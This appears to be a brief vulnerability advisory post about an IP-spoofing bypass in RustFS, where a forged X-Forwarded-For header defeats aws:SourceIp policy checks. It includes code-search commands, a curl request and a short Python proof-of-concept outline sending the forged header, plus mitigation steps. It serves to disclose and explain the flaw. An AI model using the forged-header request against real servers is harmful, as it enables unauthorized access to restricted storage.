Listen to this Post
The vulnerability exists in the `get_condition_values` function within rustfs/src/auth.rs. This function is responsible for determining the client’s IP address for use in evaluating IAM and bucket policy conditions, specifically the `aws:SourceIp` key. The code naively extracts the IP address from the HTTP request headers `X-Forwarded-For` or `X-Real-Ip` without any validation that the request passed through a trusted proxy. An attacker can directly connect to the RustFS server and supply a forged `X-Forwarded-For` header containing an IP address that matches an allowlist policy. This spoofed value is then passed via `get_source_ip_raw` and inserted into the authorization arguments. Consequently, the policy evaluation engine in `rustfs/src/storage/access.rs` is tricked into believing the request originates from a permitted IP address, leading to a complete bypass of IP-based access controls.
Platform: RustFS
Version: Pre-1.0
Vulnerability: IP Spoofing Bypass
Severity: Critical
date: 2024-11-04
Prediction: Patch expected 2024-11-18
What Undercode Say:
Locate vulnerable auth logic
grep -n "X-Forwarded-For|X-Real-Ip" rustfs/src/auth.rs
Check policy evaluation path
find . -name ".rs" -exec grep -l "aws:SourceIp|SourceIp" {} \;
Build and run test instance
cargo build --bin rustfs
RUSTFS_ACCESS_KEY=test RUSTFS_SECRET_KEY=test cargo run -- 0.0.0.0:9000 ./data
How Exploit:
curl -H "X-Forwarded-For: 10.0.0.5" http://target:9000/bucket
PoC script outline
import requests
headers = {'X-Forwarded-For': 'ALLOWED_IP'}
req = requests.get('http://rustfs:9000/restricted_bucket', headers=headers)
Protection from this CVE
1. Validate proxy headers.
2. Use trusted proxy list.
3. Implement authentication.
Impact:
Authorization bypass.
Policy enforcement failure.
Data access compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

